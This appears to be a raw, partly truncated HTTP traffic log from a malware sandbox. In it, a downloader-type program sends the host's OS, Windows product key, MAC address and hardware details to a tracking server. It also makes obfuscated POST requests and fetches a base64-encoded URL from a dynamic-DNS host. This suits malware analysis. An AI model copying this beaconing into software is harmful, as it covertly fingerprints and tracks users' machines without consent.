HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:17 GMT
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:6d64"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 fuzhou183:8111 (Cdn Cache Server V2.0), 1.1 db77:10 (Cdn Cache Server V2.0)
Connection: keep-alive
(binary ICO body) <<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >
<head><title>
	...............</title></head>
<body>
    <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&amp;Resolution=1276*846&amp;OS=Microsoft Windows XP Professional&amp;KEY=76487-341-6719426-22526&amp;Mac=00-0C-29-02-CD-FB&amp;HardDrive=00000000000000000001&amp;CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&amp;Graphics=VMware SVGA II&amp;Safe=&amp;QQ=&amp;Sougou=&amp;Lmarkid=88&amp;Wmarkid=63&amp;Mtype=19&amp;tick=1446872431&amp;flag=72ea6a2bb016edd8a444cdd51fccfdc2&amp;status=1&amp;qqnumber=&amp;downloadtime=0&amp;setuptime=0&amp;downloadflag=0&amp;v=V1.9" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />
    <div style="text-align:center">
        <img title="webgo"
    </div>
    </form>
</body>
</html>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >
<head><title>
	...............</title></head>
<body>
    <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&amp;Resolution=1276*846&amp;OS=Microsoft Windows XP Professional&amp;KEY=76487-341-6719426-22526&amp;Mac=00-0C-29-02-CD-FB&amp;HardDrive=00000000000000000001&amp;CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&amp;Graphics=VMware SVGA II&amp;Safe=&amp;QQ=&amp;Sougou=&amp;Lmarkid=88&amp;Wmarkid=63&amp;Mtype=19&amp;tick=1446872435&amp;flag=e96394f018d0f2b7394f88916459f7e4&amp;status=2&amp;qqnumber=&amp;downloadtime=0&amp;setuptime=0&amp;downloadflag=0&amp;v=V1.9" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />
    <div style="text-align:center">
        <img title="webgo"
    </div>
    </form>
</body>
</html>
GET /1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 17990.vicp.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 07 Nov 2015 04:59:45 GMT
Content-Type: text/html
Content-Length: 102
Connection: keep-alive
ETag: "550c2d1a-66"
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17476535.js"></script>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00089320501911494410110713
Server: Apache
tracecode: 00089320501911494410110713
Set-Cookie: BAIDUID=DA04B4066DA68D7236FB11CB7AC286DA:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991409270581376522110712
Server: Apache
tracecode: 35991409270581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B8CA6E1AA9F73D13D:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /dc.base/1.0.3/css/base.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.daicuo.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:58:41 GMT
Content-Type: text/css
Content-Length: 1691
Last-Modified: Thu, 16 Apr 2015 11:10:24 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "552f98a0-69b"
Expires: Sat, 07 Nov 2015 16:58:41 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
@font-face{font-family:'iconfont';src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot');src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot?#iefix') format('embedded-opentype'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.woff') format('woff'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.ttf') format('truetype'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.svg#iconfont') format('svg');}
.iconfont{position:relative;top:1px;display:inline-block;font-weight:normal;line-height:1;font-family:"iconfont" !important;font-style:normal;-webkit-font-smoothing:antialiased;-webkit-text-stroke-width:0.2px;-moz-osx-font-smoothing:grayscale;}
.iconfont:empty{width:1em;}
.icon-tsina:before{content:"\1111";}.icon-tqq:before{content:"\5555";}.icon-weixin:before{content:"\e607";}.icon-qq:before{content:"\7777";}.icon-qzone:before{content:"\9999";}.icon-top:before{content:"\4444";}.icon-dingyue:before{content:"\2222";}.icon-github:before{content:"\3333";}.icon-ma:before{content:"\6666";}.icon-yuedu:before{content:"\8888";}
.icon-biaoqing:before{content:"\e600";}.icon-chuangshiren:before{content:"\e602";}.icon-guanliyuan:before{content:"\e601";}.icon-fenxiang:before{content:"\e603";}.icon-qz:before{content:"\e604";}.icon-addgroup:before{content:"\e605";}.icon-qunzu:before{content:"\e606";}.icon-tuijian:before{content:"\e608";}.icon-discover:before{content:"\e60a";}.icon-website:before{content:"\e60c";}.icon-audit:before{content:"\e612";}.icon-music:before{content:"\e60e";}.icon-video:before{content:"<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00058821140271667466110713
Server: Apache
tracecode: 00058821140271667466110713
Set-Cookie: BAIDUID=DC3B4452E5376F0DF4258E7C406A2A02:FG=1; expires=Sun, 06-Nov-16 05:00:05 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999935041911494410110712
Server: Apache
tracecode: 35999935041911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BFBF5A997083E266E:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
GET /?89-sd--ant- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065; expires=Sat, 07-Nov-2015 05:59:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
X-Powered-By: ThinkPHP2218..<!DOCTYPE html>..<html lang="zh-cn">..<head>..
<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" co
ntent="IE=edge">..<meta name="viewport" content="width=device-wi
dth, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">..<m
eta name="renderer" content="webkit">..<title>...............
..._...1..._.........</title>..<meta name="keywords" content=
"" />..<meta name="description" content="" />..<link rel="
shortcut icon" href="/favicon.ico" type="image/x-icon" />..<link
rel="stylesheet" type="text/css" href="hXXp://cdn.daicuo.cc/dc.base/1
.0.3/css/base.min.css?1.0.247" />..<link rel="stylesheet" type="
text/css" href="/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247"
/>..<link rel="stylesheet" type="text/css" href="/View/Home/Tas
k/css.base.css?1.0.247" />..<link rel="stylesheet" type="text/cs
s" href="/View/Home/Task/css.task.css?1.0.247" />..<!--[if lt IE
9]>..<script src="/Public/html5shiv/3.7.2/html5shiv.min.js">
</script>..<script src="/Public/respond/1.4.2/respond.min.js"
></script>..<![endif]-->..<script>var dc={root:"/
",domain:"VVV.xieshouz.com",id:"",page:"1",userid:"",username:"",'lazy
load':""};</script>..</head>..<body>..<nav class=
"navbar navbar-inverse" role="navigation">.. <div class="contai
ner">.. <div class="row"><div class="col-md-12 col-md-off
set-0">.. <div class="navbar-header">.. <butto<<< skipped >>>
GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:49 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-
2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/boo
tstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License
| github.com/necolas/normalize.css */html{font-family:sans-serif;-web
kit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}arti
cle,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav
,section,summary{display:block}audio,canvas,progress,video{display:inl
ine-block;vertical-align:baseline}audio:not([controls]){display:none;h
eight:0}[hidden],template{display:none}a{background-color:transparent}
a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,stro
ng{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2
em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{positio
n:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top
:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}f
igure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-
box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,k
bd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input
,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{o
verflow:visible}button,select{text-transform:none}button,html input[ty
pe=button],input[type=reset],input[type=submit]{-webkit-appearance:but
ton;cursor:pointer}button[disabled],html input[disabled]{cursor:defaul
t}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde<<< skipped >>>
GET /Public/respond/1.4.2/respond.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: application/javascript
Content-Length: 4381
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-111d"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes/*! Respond.js v1.4.2: min/max-width media query polyfill * Copyright
2013 Scott Jehl.. * Licensed under hXXps://github.com/scottjehl/Respon
d/blob/master/LICENSE-MIT.. * */..!function(a){"use strict";a.matchMe
dia=a.matchMedia||function(a){var b,c=a.documentElement,d=c.firstEleme
ntChild||c.firstChild,e=a.createElement("body"),f=a.createElement("div
");return f.id="mq-test-1",f.style.cssText="position:absolute;top:-100
em",e.style.background="none",e.appendChild(f),function(a){return f.in
nerHTML='<style media="' a '"> #mq-test-1 { width: 42px; }&
lt;/style>',c.insertBefore(e,d),b=42===f.offsetWidth,c.removeChild(
e),{matches:b,media:a}}}(a.document)}(this),function(a){"use strict";f
unction b(){u(!0)}var c={};a.respond=c,c.update=function(){};var d=[],
e=function(){var b=!1;try{b=new a.XMLHttpRequest}catch(c){b=new a.Acti
veXObject("Microsoft.XMLHTTP")}return function(){return b}}(),f=functi
on(a,b){var c=e();c&&(c.open("GET",a,!0),c.onreadystatechange=function
(){4!==c.readyState||200!==c.status&&304!==c.status||b(c.responseText)
},4!==c.readyState&&c.send(null))};if(c.ajax=f,c.queue=d,c.regex={medi
a:/@media[^\{] \{([^\{\}]*\{[^\}\{]*\}) /gi,keyframes:/@(?:\-(?:o|moz|
webkit)\-)?keyframes[^\{] \{(?:[^\{\}]*\{[^\}\{]*\}) [^\}]*\}/gi,urls:
/(url\()['"]?([^\/\)'"][^:\)'"] )['"]?(\))/g,findStyles:/@media *([^\{
] )\{([\S\s] ?)$/,only:/(only\s )?([a-zA-Z] )\s?/,minw:/\([\s]*min\-wi
dth\s*:[\s]*([\s]*[0-9\.] )(px|em)[\s]*\)/,maxw:/\([\s]*max\-width\s*:
[\s]*([\s]*[0-9\.] )(px|em)[\s]*\)/},c.mediaQueriesSupported=a.mat<<< skipped >>>
GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-
2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/boo
tstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License
| github.com/necolas/normalize.css */html{font-family:sans-serif;-web
kit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}arti
cle,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav
,section,summary{display:block}audio,canvas,progress,video{display:inl
ine-block;vertical-align:baseline}audio:not([controls]){display:none;h
eight:0}[hidden],template{display:none}a{background-color:transparent}
a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,stro
ng{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2
em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{positio
n:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top
:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}f
igure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-
box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,k
bd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input
,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{o
verflow:visible}button,select{text-transform:none}button,html input[ty
pe=button],input[type=reset],input[type=submit]{-webkit-appearance:but
ton;cursor:pointer}button[disabled],html input[disabled]{cursor:defaul
t}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde<<< skipped >>>
GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: byteshtml,body {.. overflow-x: hidden;..}..body {.. background: #ebebeb;.
. position: relative;...font-family: "Helvetica Neue","Microsoft YaHe
i","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{..
color: #333;..}..a:hover,a:focus {.. color: #f60;.. text-decoration
: none;..}..a:focus {.. outline: thin dotted;.. outline: 5px auto -w
ebkit-focus-ring-color;.. outline-offset: -2px;..}../*bootstrap field
set*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../
*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap na
v*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...na
vbar-inverse .navbar-nav>li>a{.. color: #fff;..}...navbar-inver
se .navbar-nav>li>a:hover{.. color: #999;..}...navbar-inverse .
navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>
;a:focus,...navbar-inverse .navbar-nav>.active>a:hover{.. color
: #ddd;.. background-color:#080808;..}...navbar-collapse{...font-size
: 1.1em;..}../*bootstrap page*/...pagination > li > a,...paginat
ion > li > span {.. position: relative;.. float: left;.. padd
ing: 6px 12px;.. margin: 0px 5px;.. line-height: 1.45;.. color: #22
2;.. text-decoration: none;.. background-color: #fff;.. border: 1px
solid #ddd;..}...pagination > li.disabled > a{.. font-weight:
bold;...}...pagination > li > a:hover,...pagination > li >
span:hover,...pagination > li > a:focus,...pagination > li &
gt; span:focus {.. color: #2cab93;.. background-color: #eee;..<<< skipped >>>
GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes/*task inc*/..h4,h4 a{.. color: #F60;..}..h4 a:hover{.. color: #333;
..}../*channel/list/tag*/...dc-item li{.. margin-bottom: 20px;.. ove
rflow: hidden;..}...dc-item p{ .. line-height: 2.0;..}...dc-item p.le
ad{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.l
ead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{
...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...m
argin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}.
..dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.d
c-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;.. marg
in-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidde
n;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-si
ze:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margi
n:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{.
..font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal
;..}...dc-task-pad{...padding:40px 0;..}...dc-content{.. margin-botto
m: 15px;...font-size: 1.2em;.. line-height: 1.8em;...color: #555;...o
verflow: hidden;..}...dc-content a{.. color: #f60;..}...dc-content a:
hover{.. color: #333;..}...dc-content .nav-tabs{.. margin-top:15px;.
.}...dc-content .tab-content{.. padding-top: 15px;..}...dc-content .a
pply{.. padding:20px 0;.. text-align: center;..}...dc-content .dc-im
age{...margin:0 auto;..}...dc-content table td{.. padding-left: 10px;
..}...dc-content pre {...border-radius: 0;.. margin: 1.64em 0;..<<< skipped >>>
GET /Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:57 GMT
Content-Type: application/javascript
Content-Length: 36816
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "557f7832-8fd0"
Expires: Sat, 07 Nov 2015 16:59:57 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes/*!. * Bootstrap v3.3.5 (hXXp://getbootstrap.com). * Copyright 2011-20
15 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"=
=typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery
"); function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split("."
);if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error
("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQ
uery), function(a){"use strict";function b(){var a=document.createElem
ent("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransiti
on:"transitionend",OTransition:"oTransitionEnd otransitionend",transit
ion:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:
b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a
(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d
).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(fu
nction(){a.support.transition=b(),a.support.transition&&(a.event.speci
al.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.s
upport.transition.end,handle:function(b){return a(b.target).is(this)?b
.handleObj.handler.apply(this,arguments):void 0}})})}(jQuery), functio
n(a){"use strict";function b(b){return this.each(function(){var c=a(th
is),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"=
=typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b)
{a(b).on("click",c,this.close)};d.VERSION="3.3.5",d.TRANSITION_DURATIO
N=150,d.prototype.close=function(b){function c(){g.detach().trigge<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991274551213477898110712
Server: Apache
tracecode: 35991274551213477898110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BCA2EF032D9175BBE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
